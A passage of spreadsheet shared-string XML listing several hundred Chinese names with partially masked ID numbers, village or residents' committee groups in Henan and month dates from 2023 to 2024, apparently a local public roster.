    <t>藏兴华</t>
  </si>
  <si>
    <t>1773</t>
  </si>
  <si>
    <t>郝龙海</t>
  </si>
  <si>
    <t>1774</t>
  </si>
  <si>
    <t>郝嘉亮</t>
  </si>
  <si>
    <t>411321********6137</t>
  </si>
  <si>
    <t>1775</t>
  </si>
  <si>
    <t>罗小丽</t>
  </si>
  <si>
    <t>1776</t>
  </si>
  <si>
    <t>梁士奇</t>
  </si>
  <si>
    <t>412921********1559</t>
  </si>
  <si>
    <t>1777</t>
  </si>
  <si>
    <t>杨雅迪</t>
  </si>
  <si>
    <t>411326********6126</t>
  </si>
  <si>
    <t>1778</t>
  </si>
  <si>
    <t>严银芝</t>
  </si>
  <si>
    <t>412921********1682</t>
  </si>
  <si>
    <t>1779</t>
  </si>
  <si>
    <t>罗爱华</t>
  </si>
  <si>
    <t>620103********2313</t>
  </si>
  <si>
    <t>1780</t>
  </si>
  <si>
    <t>齐运动</t>
  </si>
  <si>
    <t>1781</t>
  </si>
  <si>
    <t>赵建华</t>
  </si>
  <si>
    <t>1782</t>
  </si>
  <si>
    <t>程永</t>
  </si>
  <si>
    <t>412921********1592</t>
  </si>
  <si>
    <t>2023年9月</t>
  </si>
  <si>
    <t>1783</t>
  </si>
  <si>
    <t>程心柳</t>
  </si>
  <si>
    <t>411321********6145</t>
  </si>
  <si>
    <t>1784</t>
  </si>
  <si>
    <t>张森</t>
  </si>
  <si>
    <t>411326********1531</t>
  </si>
  <si>
    <t>1785</t>
  </si>
  <si>
    <t>张嘉铭</t>
  </si>
  <si>
    <t>411321********5317</t>
  </si>
  <si>
    <t>1786</t>
  </si>
  <si>
    <t>小关居委会五组</t>
  </si>
  <si>
    <t>孟煜杰</t>
  </si>
  <si>
    <t>1787</t>
  </si>
  <si>
    <t>孟祥贵</t>
  </si>
  <si>
    <t>1788</t>
  </si>
  <si>
    <t>孟凡有</t>
  </si>
  <si>
    <t>1789</t>
  </si>
  <si>
    <t>小关居委会一组</t>
  </si>
  <si>
    <t>马明杰</t>
  </si>
  <si>
    <t>411326********1525</t>
  </si>
  <si>
    <t>1790</t>
  </si>
  <si>
    <t>小关居委会二组</t>
  </si>
  <si>
    <t>李俊志</t>
  </si>
  <si>
    <t>411326********6132</t>
  </si>
  <si>
    <t>1791</t>
  </si>
  <si>
    <t>小关居委会三组</t>
  </si>
  <si>
    <t>董运锋</t>
  </si>
  <si>
    <t>1792</t>
  </si>
  <si>
    <t>李玉辉</t>
  </si>
  <si>
    <t>411326********1515</t>
  </si>
  <si>
    <t>1793</t>
  </si>
  <si>
    <t>吴运荣</t>
  </si>
  <si>
    <t>412921********1640</t>
  </si>
  <si>
    <t>1794</t>
  </si>
  <si>
    <t>邓舒心</t>
  </si>
  <si>
    <t>411326********152X</t>
  </si>
  <si>
    <t>1795</t>
  </si>
  <si>
    <t>刘中乐</t>
  </si>
  <si>
    <t>1796</t>
  </si>
  <si>
    <t>李宏恩</t>
  </si>
  <si>
    <t>411326********1530</t>
  </si>
  <si>
    <t>1797</t>
  </si>
  <si>
    <t>朱坪村下庄组</t>
  </si>
  <si>
    <t>马连发</t>
  </si>
  <si>
    <t>4113210515</t>
  </si>
  <si>
    <t>2023年11月</t>
  </si>
  <si>
    <t>1798</t>
  </si>
  <si>
    <t>王恩环</t>
  </si>
  <si>
    <t>412921********1648</t>
  </si>
  <si>
    <t>1799</t>
  </si>
  <si>
    <t>南召店村袁庄组</t>
  </si>
  <si>
    <t>王文明</t>
  </si>
  <si>
    <t>1800</t>
  </si>
  <si>
    <t>朱应霞</t>
  </si>
  <si>
    <t>1801</t>
  </si>
  <si>
    <t>段成龙</t>
  </si>
  <si>
    <t>411321********6136</t>
  </si>
  <si>
    <t>1802</t>
  </si>
  <si>
    <t>段涵馨</t>
  </si>
  <si>
    <t>411321********0381</t>
  </si>
  <si>
    <t>1803</t>
  </si>
  <si>
    <t>李清</t>
  </si>
  <si>
    <t>1804</t>
  </si>
  <si>
    <t>小关居委会</t>
  </si>
  <si>
    <t>任行迪</t>
  </si>
  <si>
    <t>1805</t>
  </si>
  <si>
    <t>王漫</t>
  </si>
  <si>
    <t>411321********558X</t>
  </si>
  <si>
    <t>1806</t>
  </si>
  <si>
    <t>董万玲</t>
  </si>
  <si>
    <t>2024年1月</t>
  </si>
  <si>
    <t>1807</t>
  </si>
  <si>
    <t>李红金</t>
  </si>
  <si>
    <t>1808</t>
  </si>
  <si>
    <t>王振豪</t>
  </si>
  <si>
    <t>411326********1516</t>
  </si>
  <si>
    <t>1809</t>
  </si>
  <si>
    <t>西关居委会一组</t>
  </si>
  <si>
    <t>杨锋</t>
  </si>
  <si>
    <t>1810</t>
  </si>
  <si>
    <t>大关居委会一组</t>
  </si>
  <si>
    <t>黄德龙</t>
  </si>
  <si>
    <t>1811</t>
  </si>
  <si>
    <t>王明朝</t>
  </si>
  <si>
    <t>1812</t>
  </si>
  <si>
    <t>董洪强</t>
  </si>
  <si>
    <t>2024年4月</t>
  </si>
  <si>
    <t>1813</t>
  </si>
  <si>
    <t>南召店村（医药库)</t>
  </si>
  <si>
    <t>凌润鹏</t>
  </si>
  <si>
    <t>411321********0175</t>
  </si>
  <si>
    <t>1814</t>
  </si>
  <si>
    <t>李永录</t>
  </si>
  <si>
    <t>2024年5月</t>
  </si>
  <si>
    <t>1815</t>
  </si>
  <si>
    <t>山头村余庄组</t>
  </si>
  <si>
    <t>谢书勤</t>
  </si>
  <si>
    <t>4113210512</t>
  </si>
  <si>
    <t>2024年6月</t>
  </si>
  <si>
    <t>1816</t>
  </si>
  <si>
    <t>南召店村</t>
  </si>
  <si>
    <t>张云洋</t>
  </si>
  <si>
    <t>1817</t>
  </si>
  <si>
    <t>袁顺敏</t>
  </si>
  <si>
    <t>2024年8月</t>
  </si>
  <si>
    <t>1818</t>
  </si>
  <si>
    <t>小关居委会四组</t>
  </si>
  <si>
    <t>王全成</t>
  </si>
  <si>
    <t>1819</t>
  </si>
  <si>
    <t>大关居委会五组</t>
  </si>
  <si>
    <t>林清勤</t>
  </si>
  <si>
    <t>1820</t>
  </si>
  <si>
    <t>景相新</t>
  </si>
  <si>
    <t>411326********1514</t>
  </si>
  <si>
    <t>2024年11月</t>
  </si>
  <si>
    <t>1821</t>
  </si>
  <si>
    <t>唐庄村西岭组</t>
  </si>
  <si>
    <t>陈玉勤</t>
  </si>
  <si>
    <t>412921********1688</t>
  </si>
  <si>
    <t>411321050101</t>
  </si>
  <si>
    <t>1822</t>
  </si>
  <si>
    <t>张嘉欣</t>
  </si>
  <si>
    <t>411326********6163</t>
  </si>
  <si>
    <t>1823</t>
  </si>
  <si>
    <t>王春龙</t>
  </si>
  <si>
    <t>1824</t>
  </si>
  <si>
    <t>南召店村（大理石厂）</t>
  </si>
  <si>
    <t>张国军</t>
  </si>
  <si>
    <t>1825</t>
  </si>
  <si>
    <t>闫光耀</t>
  </si>
  <si>
    <t>1826</t>
  </si>
  <si>
    <t>闫文连</t>
  </si>
  <si>
    <t>412930********1789</t>
  </si>
  <si>
    <t>1827</t>
  </si>
  <si>
    <t>李秀芝</t>
  </si>
  <si>
    <t>1828</t>
  </si>
  <si>
    <t>张玉英</t>
  </si>
  <si>
    <t>412929********2942</t>
  </si>
  <si>
    <t>1829</t>
  </si>
  <si>
    <t>皇后乡</t>
  </si>
  <si>
    <t>李德运</t>
  </si>
  <si>
    <t>412921********201X</t>
  </si>
  <si>
    <t>4113210615</t>
  </si>
  <si>
    <t>1830</t>
  </si>
  <si>
    <t>杨丰兰</t>
  </si>
  <si>
    <t>412921********2020</t>
  </si>
  <si>
    <t>1831</t>
  </si>
  <si>
    <t>段庆印</t>
  </si>
  <si>
    <t>412921********2031</t>
  </si>
  <si>
    <t>1832</t>
  </si>
  <si>
    <t>乔国玺</t>
  </si>
  <si>
    <t>1833</t>
  </si>
  <si>
    <t>赵如贤</t>
  </si>
  <si>
    <t>412921********208X</t>
  </si>
  <si>
    <t>1834</t>
  </si>
  <si>
    <t>邱丰祥</t>
  </si>
  <si>
    <t>412921********2038</t>
  </si>
  <si>
    <t>1835</t>
  </si>
  <si>
    <t>魏书芳</t>
  </si>
  <si>
    <t>412921********2023</t>
  </si>
  <si>
    <t>1836</t>
  </si>
  <si>
    <t>张国凤</t>
  </si>
  <si>
    <t>412921********2048</t>
  </si>
  <si>
    <t>1837</t>
  </si>
  <si>
    <t>412921********202X</t>
  </si>
  <si>
    <t>1838</t>
  </si>
  <si>
    <t>刘建伟</t>
  </si>
  <si>
    <t>412921********2033</t>
  </si>
  <si>
    <t>1839</t>
  </si>
  <si>
    <t>乔运发</t>
  </si>
  <si>
    <t>412921********2017</t>
  </si>
  <si>
    <t>1840</t>
  </si>
  <si>
    <t>段召甫</t>
  </si>
  <si>
    <t>1841</t>
  </si>
  <si>
    <t>李好</t>
  </si>
  <si>
    <t>412921********2026</t>
  </si>
  <si>
    <t>1842</t>
  </si>
  <si>
    <t>刘香琴</t>
  </si>
  <si>
    <t>412921********2063</t>
  </si>
  <si>
    <t>1843</t>
  </si>
  <si>
    <t>石教明</t>
  </si>
  <si>
    <t>412921********2051</t>
  </si>
  <si>
    <t>1844</t>
  </si>
  <si>
    <t>段召宾</t>
  </si>
  <si>
    <t>412921********2010</t>
  </si>
  <si>
    <t>1845</t>
  </si>
  <si>
    <t>张运朝</t>
  </si>
  <si>
    <t>412921********2032</t>
  </si>
  <si>
    <t>1846</t>
  </si>
  <si>
    <t>卫洪信</t>
  </si>
  <si>
    <t>412921********2018</t>
  </si>
  <si>
    <t>1847</t>
  </si>
  <si>
    <t>王书芝</t>
  </si>
  <si>
    <t>412921********2045</t>
  </si>
  <si>
    <t>1848</t>
  </si>
  <si>
    <t>卫洪庆</t>
  </si>
  <si>
    <t>412921********2052</t>
  </si>
  <si>
    <t>1849</t>
  </si>
  <si>
    <t>李巧</t>
  </si>
  <si>
    <t>412921********4028</t>
  </si>
  <si>
    <t>1850</t>
  </si>
  <si>
    <t>任保军</t>
  </si>
  <si>
    <t>412921********2014</t>
  </si>
  <si>
    <t>1851</t>
  </si>
  <si>
    <t>段庆红</t>
  </si>
  <si>
    <t>1852</t>
  </si>
  <si>
    <t>乔国珍</t>
  </si>
  <si>
    <t>412921********2037</t>
  </si>
  <si>
    <t>1853</t>
  </si>
  <si>
    <t>肖爱花</t>
  </si>
  <si>
    <t>412921********2027</t>
  </si>
  <si>
    <t>1854</t>
  </si>
  <si>
    <t>刘中原</t>
  </si>
  <si>
    <t>1855</t>
  </si>
  <si>
    <t>司金花</t>
  </si>
  <si>
    <t>412921********2089</t>
  </si>
  <si>
    <t>1856</t>
  </si>
  <si>
    <t>朱洪来</t>
  </si>
  <si>
    <t>1857</t>
  </si>
  <si>
    <t>邱喜转</t>
  </si>
  <si>
    <t>412921********2085</t>
  </si>
  <si>
    <t>1858</t>
  </si>
  <si>
    <t>1859</t>
  </si>
  <si>
    <t>马桂勤</t>
  </si>
  <si>
    <t>412921********2024</t>
  </si>
  <si>
    <t>1860</t>
  </si>
  <si>
    <t>刘金太</t>
  </si>
  <si>
    <t>1861</t>
  </si>
  <si>
    <t>朱清芝</t>
  </si>
  <si>
    <t>412921********204X</t>
  </si>
  <si>
    <t>1862</t>
  </si>
  <si>
    <t>卫天秀</t>
  </si>
  <si>
    <t>412921********2012</t>
  </si>
  <si>
    <t>1863</t>
  </si>
  <si>
    <t>朱齐玲</t>
  </si>
  <si>
    <t>1864</t>
  </si>
  <si>
    <t>段庆才</t>
  </si>
  <si>
    <t>412921********207X</t>
  </si>
  <si>
    <t>1865</t>
  </si>
  <si>
    <t>潘素玲</t>
  </si>
  <si>
    <t>412921********2044</t>
  </si>
  <si>
    <t>1866</t>
  </si>
  <si>
    <t>胡松奇</t>
  </si>
  <si>
    <t>412921********2056</t>
  </si>
  <si>
    <t>1867</t>
  </si>
  <si>
    <t>刘金香</t>
  </si>
  <si>
    <t>412921********2540</t>
  </si>
  <si>
    <t>1868</t>
  </si>
  <si>
    <t>殷书春</t>
  </si>
  <si>
    <t>412921********2050</t>
  </si>
  <si>
    <t>1869</t>
  </si>
  <si>
    <t>段庆先</t>
  </si>
  <si>
    <t>412921********2060</t>
  </si>
  <si>
    <t>1870</t>
  </si>
  <si>
    <t>刘金兰</t>
  </si>
  <si>
    <t>1871</t>
  </si>
  <si>
    <t>刘运军</t>
  </si>
  <si>
    <t>412921********2016</t>
  </si>
  <si>
    <t>1872</t>
  </si>
  <si>
    <t>卫天强</t>
  </si>
  <si>
    <t>412921********2013</t>
  </si>
  <si>
    <t>1873</t>
  </si>
  <si>
    <t>闫俊敏</t>
  </si>
  <si>
    <t>412921********2069</t>
  </si>
  <si>
    <t>1874</t>
  </si>
  <si>
    <t>段庆万</t>
  </si>
  <si>
    <t>1875</t>
  </si>
  <si>
    <t>412921********2040</t>
  </si>
  <si>
    <t>1876</t>
  </si>
  <si>
    <t>李国兰</t>
  </si>
  <si>
    <t>412921********2025</t>
  </si>
  <si>
    <t>1877</t>
  </si>
  <si>
    <t>朱佳琳</t>
  </si>
  <si>
    <t>411326********2029</t>
  </si>
  <si>
    <t>1878</t>
  </si>
  <si>
    <t>段庆亮</t>
  </si>
  <si>
    <t>412921********2011</t>
  </si>
  <si>
    <t>1879</t>
  </si>
  <si>
    <t>陈明会</t>
  </si>
  <si>
    <t>412921********2029</t>
  </si>
  <si>
    <t>1880</t>
  </si>
  <si>
    <t>朱荣梅</t>
  </si>
  <si>
    <t>412921********2028</t>
  </si>
  <si>
    <t>1881</t>
  </si>
  <si>
    <t>朱洪军</t>
  </si>
  <si>
    <t>412921********2034</t>
  </si>
  <si>
    <t>1882</t>
  </si>
  <si>
    <t>袁金华</t>
  </si>
  <si>
    <t>1883</t>
  </si>
  <si>
    <t>段召玲</t>
  </si>
  <si>
    <t>1884</t>
  </si>
  <si>
    <t>徐付营</t>
  </si>
  <si>
    <t>411321********2023</t>
  </si>
  <si>
    <t>1885</t>
  </si>
  <si>
    <t>段庆成</t>
  </si>
  <si>
    <t>1886</t>
  </si>
  <si>
    <t>王华</t>
  </si>
  <si>
    <t>412921********2066</t>
  </si>
  <si>
    <t>1887</t>
  </si>
  <si>
    <t>袁福国</t>
  </si>
  <si>
    <t>1888</t>
  </si>
  <si>
    <t>马希勤</t>
  </si>
  <si>
    <t>1889</t>
  </si>
  <si>
    <t>乔花青</t>
  </si>
  <si>
    <t>412921********2081</t>
  </si>
  <si>
    <t>1890</t>
  </si>
  <si>
    <t>王永志</t>
  </si>
  <si>
    <t>1891</t>
  </si>
  <si>
    <t>张桂玲</t>
  </si>
  <si>
    <t>412921********2043</t>
  </si>
  <si>
    <t>1892</t>
  </si>
  <si>
    <t>袁天宝</t>
  </si>
  <si>
    <t>412921********2036</t>
  </si>
  <si>
    <t>1893</t>
  </si>
  <si>
    <t>胡国云</t>
  </si>
  <si>
    <t>1894</t>
  </si>
  <si>
    <t>张广先</t>
  </si>
  <si>
    <t>1895</t>
  </si>
  <si>
    <t>殷金玲</t>
  </si>
  <si>
    <t>412921********2047</t>
  </si>
  <si>
    <t>1896</t>
  </si>
  <si>
    <t>牛金瑞</t>
  </si>
  <si>
    <t>1897</t>
  </si>
  <si>
    <t>朱清德</t>
  </si>
  <si>
    <t>412921********2039</t>
  </si>
  <si>
    <t>1898</t>
  </si>
  <si>
    <t>陈广娥</t>
  </si>
  <si>
    <t>1899</t>
  </si>
  <si>
    <t>李永银</t>
  </si>
  <si>
    <t>1900</t>
  </si>
  <si>
    <t>段召记</t>
  </si>
  <si>
    <t>1901</t>
  </si>
  <si>
    <t>张文芝</t>
  </si>
  <si>
    <t>1902</t>
  </si>
  <si>
    <t>曹付国</t>
  </si>
  <si>
    <t>412921********2035</t>
  </si>
  <si>
    <t>1903</t>
  </si>
  <si>
    <t>袁斌宏</t>
  </si>
  <si>
    <t>1904</t>
  </si>
  <si>
    <t>段庆强</t>
  </si>
  <si>
    <t>1905</t>
  </si>
  <si>
    <t>袁海燕</t>
  </si>
  <si>
    <t>1906</t>
  </si>
  <si>
    <t>邱向东</t>
  </si>
  <si>
    <t>1907</t>
  </si>
  <si>
    <t>张国如</t>
  </si>
  <si>
    <t>412921********2021</t>
  </si>
  <si>
    <t>1908</t>
  </si>
  <si>
    <t>邱喜成</t>
  </si>
  <si>
    <t>412921********2074</t>
  </si>
  <si>
    <t>1909</t>
  </si>
  <si>
    <t>李国玲</t>
  </si>
  <si>
    <t>1910</t>
  </si>
  <si>
    <t>常开路</t>
  </si>
  <si>
    <t>1911</t>
  </si>
  <si>
    <t>卫天勤</t>
  </si>
  <si>
    <t>1912</t>
  </si>
  <si>
    <t>魏敏</t>
  </si>
  <si>
    <t>1913</t>
  </si>
  <si>
    <t>卫金华</t>
  </si>
  <si>
    <t>1914</t>
  </si>
  <si>
    <t>申庆丽</t>
  </si>
  <si>
    <t>1915</t>
  </si>
  <si>
    <t>邱海清</t>
  </si>
  <si>
    <t>412921********2053</t>
  </si>
  <si>
    <t>1916</t>
  </si>
  <si>
    <t>康俊坡</t>
  </si>
  <si>
    <t>412921********203X</t>
  </si>
  <si>
    <t>1917</t>
  </si>
  <si>
    <t>袁爱云</t>
  </si>
  <si>
    <t>1918</t>
  </si>
  <si>
    <t>段召贵</t>
  </si>
  <si>
    <t>1919</t>
  </si>
  <si>
    <t>刘玉梅</t>
  </si>
  <si>
    <t>1920</t>
  </si>
  <si>
    <t>段庆生</t>
  </si>
  <si>
    <t>1921</t>
  </si>
  <si>
    <t>高金凤</t>
  </si>
  <si>
    <t>1922</t>
  </si>
  <si>
    <t>段庆安</t>
  </si>
  <si>
    <t>1923</t>
  </si>
  <si>
    <t>412921********2068</t>
  </si>
  <si>
    <t>1924</t>
  </si>
  <si>
    <t>刘长波</t>
  </si>
  <si>
    <t>1925</t>
  </si>
  <si>
    <t>任桂云</t>
  </si>
  <si>
    <t>1926</t>
  </si>
  <si>
    <t>曹喜安</t>
  </si>
  <si>
    <t>1927</t>
  </si>
  <si>
    <t>1928</t>
  </si>
  <si>
    <t>訾华</t>
  </si>
  <si>
    <t>410423********4025</t>
  </si>
  <si>
    <t>1929</t>
  </si>
  <si>
    <t>刘闪娜</t>
  </si>
  <si>
    <t>411326********2025</t>
  </si>
  <si>
    <t>1930</t>
  </si>
  <si>
    <t>曹帅</t>
  </si>
  <si>
    <t>1931</t>
  </si>
  <si>
    <t>卫天玉</t>
  </si>
  <si>
    <t>412921********2059</t>
  </si>
  <si>
    <t>1932</t>
  </si>
  <si>
    <t>李成珍</t>
  </si>
  <si>
    <t>412921********2049</t>
  </si>
  <si>
    <t>1933</t>
  </si>
  <si>
    <t>袁金玉</t>
  </si>
  <si>
    <t>412921********2030</t>
  </si>
  <si>
    <t>1934</t>
  </si>
  <si>
    <t>任金花</t>
  </si>
  <si>
    <t>412921********2106</t>
  </si>
  <si>
    <t>1935</t>
  </si>
  <si>
    <t>刘运杰</t>
  </si>
  <si>
    <t>412921********2071</t>
  </si>
  <si>
    <t>1936</t>
  </si>
  <si>
    <t>朱洪花</t>
  </si>
  <si>
    <t>1937</t>
  </si>
  <si>
    <t>袁金玲</t>
  </si>
  <si>
    <t>1938</t>
  </si>
  <si>
    <t>常校旗</t>
  </si>
  <si>
    <t>411326********2011</t>
  </si>
  <si>
    <t>1939</t>
  </si>
  <si>
    <t>张天阁</t>
  </si>
  <si>
    <t>1940</t>
  </si>
  <si>
    <t>袁金会</t>
  </si>
  <si>
    <t>1941</t>
  </si>
  <si>
    <t>朱国成</t>
  </si>
  <si>
    <t>412921********2076</t>
  </si>
  <si>
    <t>1942</t>
  </si>
  <si>
    <t>袁天平</t>
  </si>
  <si>
    <t>412921********2046</t>
  </si>
  <si>
    <t>1943</t>
  </si>
  <si>
    <t>乔振东</t>
  </si>
  <si>
    <t>1944</t>
  </si>
  <si>
    <t>伍延兰</t>
  </si>
  <si>
    <t>1945</t>
  </si>
  <si>
    <t>任保海</t>
  </si>
  <si>
    <t>412921********2015</t>
  </si>
  <si>
    <t>1946</t>
  </si>
  <si>
    <t>李四营</t>
  </si>
  <si>
    <t>1947</t>
  </si>
  <si>
    <t>任金亮</t>
  </si>
  <si>
    <t>1948</t>
  </si>
  <si>
    <t>刘运芝</t>
  </si>
  <si>
    <t>1949</t>
  </si>
  <si>
    <t>乔国勇</t>
  </si>
  <si>
    <t>1950</t>
  </si>
  <si>
    <t>冯树勤</t>
  </si>
  <si>
    <t>1951</t>
  </si>
  <si>
    <t>卫金生</t>
  </si>
  <si>
    <t>1952</t>
  </si>
  <si>
    <t>姜云焕</t>
  </si>
  <si>
    <t>412921********2428</t>
  </si>
  <si>
    <t>1953</t>
  </si>
  <si>
    <t>曹付生</t>
  </si>
  <si>
    <t>1954</t>
  </si>
  <si>
    <t>刘广敏</t>
  </si>
  <si>
    <t>1955</t>
  </si>
  <si>
    <t>张春朝</t>
  </si>
  <si>
    <t>1956</t>
  </si>
  <si>
    <t>刘玉先</t>
  </si>
  <si>
    <t>1957</t>
  </si>
  <si>
    <t>张予芊彤</t>
  </si>
  <si>
    <t>411321********2046</t>
  </si>
  <si>
    <t>1958</t>
  </si>
  <si>
    <t>王小浩</t>
  </si>
  <si>
    <t>412921********1110</t>
  </si>
  <si>
    <t>1959</t>
  </si>
  <si>
    <t>张广丽</t>
  </si>
  <si>
    <t>412921********1180</t>
  </si>
  <si>
    <t>1960</t>
  </si>
  <si>
    <t>曹春芝</t>
  </si>
  <si>
    <t>1961</t>
  </si>
  <si>
    <t>刘金海</t>
  </si>
  <si>
    <t>1962</t>
  </si>
  <si>
    <t>刘一博</t>
  </si>
  <si>
    <t>411326********2014</t>
  </si>
  <si>
    <t>1963</t>
  </si>
  <si>
    <t>康真真</t>
  </si>
  <si>
    <t>411326********2061</t>
  </si>
  <si>
    <t>1964</t>
  </si>
  <si>
    <t>康徽</t>
  </si>
  <si>
    <t>411321********5277</t>
  </si>
  <si>
    <t>1965</t>
  </si>
  <si>
    <t>张有强</t>
  </si>
  <si>
    <t>1966</t>
  </si>
  <si>
    <t>段庆凤</t>
  </si>
  <si>
    <t>412921********2041</t>
  </si>
  <si>
    <t>1967</t>
  </si>
  <si>
    <t>张春青</t>
  </si>
  <si>
    <t>1968</t>
  </si>
  <si>
    <t>袁绪英</t>
  </si>
  <si>
    <t>1969</t>
  </si>
  <si>
    <t>曹春玲</t>
  </si>
  <si>
    <t>1970</t>
  </si>
  <si>
    <t>任保奇</t>
  </si>
  <si>
    <t>1971</t>
  </si>
  <si>
    <t>段兆君</t>
  </si>
  <si>
    <t>412921********2431</t>
  </si>
  <si>
    <t>1972</t>
  </si>
  <si>
    <t xml:space="preserve">郑小华  </t>
  </si>
  <si>
    <t>412921********2022</t>
  </si>
  <si>
    <t>1973</t>
  </si>
  <si>
    <t>段庆阳</t>
  </si>
  <si>
    <t>412921********2058</t>
  </si>
  <si>
    <t>1974</t>
  </si>
  <si>
    <t>朱清霞</t>
  </si>
  <si>
    <t>1975</t>
  </si>
  <si>
    <t>袁绪锋</t>
  </si>
  <si>
    <t>1976</t>
  </si>
  <si>
    <t>高书云</t>
  </si>
  <si>
    <t>1977</t>
  </si>
  <si>
    <t>朱洪祥</t>
  </si>
  <si>
    <t>1978</t>
  </si>
  <si>
    <t>贾书勤</t>
  </si>
  <si>
    <t>412921********2401</t>
  </si>
  <si>
    <t>1979</t>
  </si>
  <si>
    <t>杨明贵</t>
  </si>
  <si>
    <t>1980</t>
  </si>
  <si>
    <t>朱洪霞</t>
  </si>
  <si>
    <t>1981</t>
  </si>
  <si>
    <t>刘朱鑫</t>
  </si>
  <si>
    <t>411321********2024</t>
  </si>
  <si>
    <t>1982</t>
  </si>
  <si>
    <t>卫金中</t>
  </si>
  <si>
    <t>1983</t>
  </si>
  <si>
    <t>马延文</t>
  </si>
  <si>
    <t>1984</t>
  </si>
  <si>
    <t>曹付荣</t>
  </si>
  <si>
    <t>412921********2042</t>
  </si>
  <si>
    <t>1985</t>
  </si>
  <si>
    <t>乔振杰</t>
  </si>
  <si>
    <t>412921********2065</t>
  </si>
  <si>
    <t>1986</t>
  </si>
  <si>
    <t>卫金涛</t>
  </si>
  <si>
    <t>1987</t>
  </si>
  <si>
    <t>贺娜</t>
  </si>
  <si>
    <t>1988</t>
  </si>
  <si>
    <t>马延亮</t>
  </si>
  <si>
    <t>1989</t>
  </si>
  <si>
    <t>张保安</t>
  </si>
  <si>
    <t>1990</t>
  </si>
  <si>
    <t>张明华</t>
  </si>
  <si>
    <t>1991</t>
  </si>
  <si>
    <t>金霞</t>
  </si>
  <si>
    <t>412921********4428</t>
  </si>
  <si>
    <t>1992</t>
  </si>
  <si>
    <t>袁金龙</t>
  </si>
  <si>
    <t>1993</t>
  </si>
  <si>
    <t>袁文涛</t>
  </si>
  <si>
    <t>411321********6233</t>
  </si>
  <si>
    <t>1994</t>
  </si>
  <si>
    <t>邱喜梅</t>
  </si>
  <si>
    <t>1995</t>
  </si>
  <si>
    <t>文恒强</t>
  </si>
  <si>
    <t>412727********7472</t>
  </si>
  <si>
    <t>1996</t>
  </si>
  <si>
    <t>文静</t>
  </si>
  <si>
    <t>412727********7460</t>
  </si>
  <si>
    <t>1997</t>
  </si>
  <si>
    <t>訾延生</t>
  </si>
  <si>
    <t>412921********209X</t>
  </si>
  <si>
    <t>1998</t>
  </si>
  <si>
    <t>常丽</t>
  </si>
  <si>
    <t>411326********2047</t>
  </si>
  <si>
    <t>1999</t>
  </si>
  <si>
    <t>刘子芝</t>
  </si>
  <si>
    <t>411321********2027</t>
  </si>
  <si>
    <t>2000</t>
  </si>
  <si>
    <t>刘明嘉</t>
  </si>
  <si>
    <t>2001</t>
  </si>
  <si>
    <t>乔国娥</t>
  </si>
  <si>
    <t>2002</t>
  </si>
  <si>
    <t>刘立阳</t>
  </si>
  <si>
    <t>2003</t>
  </si>
  <si>
    <t>刘振方</t>
  </si>
  <si>
    <t>411326********2022</t>
  </si>
  <si>
    <t>2004</t>
  </si>
  <si>
    <t>张艺杭</t>
  </si>
  <si>
    <t>411322********293X</t>
  </si>
  <si>
    <t>2005</t>
  </si>
  <si>
    <t>张艺鑫</t>
  </si>
  <si>
    <t>411322********0085</t>
  </si>
  <si>
    <t>2006</t>
  </si>
  <si>
    <t>尚兰英</t>
  </si>
  <si>
    <t>2007</t>
  </si>
  <si>
    <t>王梅兰</t>
  </si>
  <si>
    <t>2008</t>
  </si>
  <si>
    <t>乔明卿</t>
  </si>
  <si>
    <t>2009</t>
  </si>
  <si>
    <t>殷金焕</t>
  </si>
  <si>
    <t>2010</t>
  </si>
  <si>
    <t>段庆玲</t>
  </si>
  <si>
    <t>412921********1141</t>
  </si>
  <si>
    <t>2011</t>
  </si>
  <si>
    <t>张琳琳</t>
  </si>
  <si>
    <t>411321********5967</t>
  </si>
  <si>
    <t>2012</t>
  </si>
  <si>
    <t>任金红</t>
  </si>
  <si>
    <t>2013</t>
  </si>
  <si>
    <t>牛娜</t>
  </si>
  <si>
    <t>411326********2041</t>
  </si>
  <si>
    <t>2014</t>
  </si>
  <si>
    <t>袁付巧</t>
  </si>
  <si>
    <t>2015</t>
  </si>
  <si>
    <t xml:space="preserve">刘文萍  </t>
  </si>
  <si>
    <t>411326********2045</t>
  </si>
  <si>
    <t>2016</t>
  </si>
  <si>
    <t>袁天三</t>
  </si>
  <si>
    <t>2017</t>
  </si>
  <si>
    <t>王娥红</t>
  </si>
  <si>
    <t>2018</t>
  </si>
  <si>
    <t>刘广艳</t>
  </si>
  <si>
    <t>2019</t>
  </si>
  <si>
    <t>李仁跃</t>
  </si>
  <si>
    <t>2020</t>
  </si>
  <si>
    <t xml:space="preserve">李怡晨 </t>
  </si>
  <si>
    <t>411321********012X</t>
  </si>
  <si>
    <t>2021</t>
  </si>
  <si>
    <t>臧营</t>
  </si>
  <si>
    <t>412921********1603</t>
  </si>
  <si>
    <t>2022</t>
  </si>
  <si>
    <t>王玉芹</t>
  </si>
  <si>
    <t>2023</t>
  </si>
  <si>
    <t>段召兰</t>
  </si>
  <si>
    <t>2024</t>
  </si>
  <si>
    <t xml:space="preserve">曹满   </t>
  </si>
  <si>
    <t>411326********2071</t>
  </si>
  <si>
    <t>2025</t>
  </si>
  <si>
    <t>卫天丽</t>
  </si>
  <si>
    <t>2026</t>
  </si>
  <si>
    <t>尚广坤</t>
  </si>
  <si>
    <t>411321********2039</t>
  </si>
  <si>
    <t>2027</t>
  </si>
  <si>
    <t>卫金朝</t>
  </si>
  <si>
    <t>2028</t>
  </si>
  <si>
    <t>张长运</t>
  </si>
  <si>
    <t>412921********2073</t>
  </si>
  <si>
    <t>2029</t>
  </si>
  <si>
    <t>袁绪旺</t>
  </si>
  <si>
    <t>2030</t>
  </si>
  <si>
    <t>高峰</t>
  </si>
  <si>
    <t>412921********1165</t>
  </si>
  <si>
    <t>2031</t>
  </si>
  <si>
    <t>张运花</t>
  </si>
  <si>
    <t>2032</t>
  </si>
  <si>
    <t>袁金长</t>
  </si>
  <si>
    <t>412921********2072</t>
  </si>
  <si>
    <t>2033</t>
  </si>
  <si>
    <t>乔国文</t>
  </si>
  <si>
    <t>2034</t>
  </si>
  <si>
    <t>张明珍</t>
  </si>
  <si>
    <t>412921********2205</t>
  </si>
  <si>
    <t>2035</t>
  </si>
  <si>
    <t>李长勉</t>
  </si>
  <si>
    <t>412921********2062</t>
  </si>
  <si>
    <t>2036</t>
  </si>
  <si>
    <t>张海玲</t>
  </si>
  <si>
    <t>2037</t>
  </si>
  <si>
    <t>邱小成</t>
  </si>
  <si>
    <t>412921********2110</t>
  </si>
  <si>
    <t>2038</t>
  </si>
  <si>
    <t>段明芝</t>
  </si>
  <si>
    <t>2039</t>
  </si>
  <si>
    <t>朱占君</t>
  </si>
  <si>
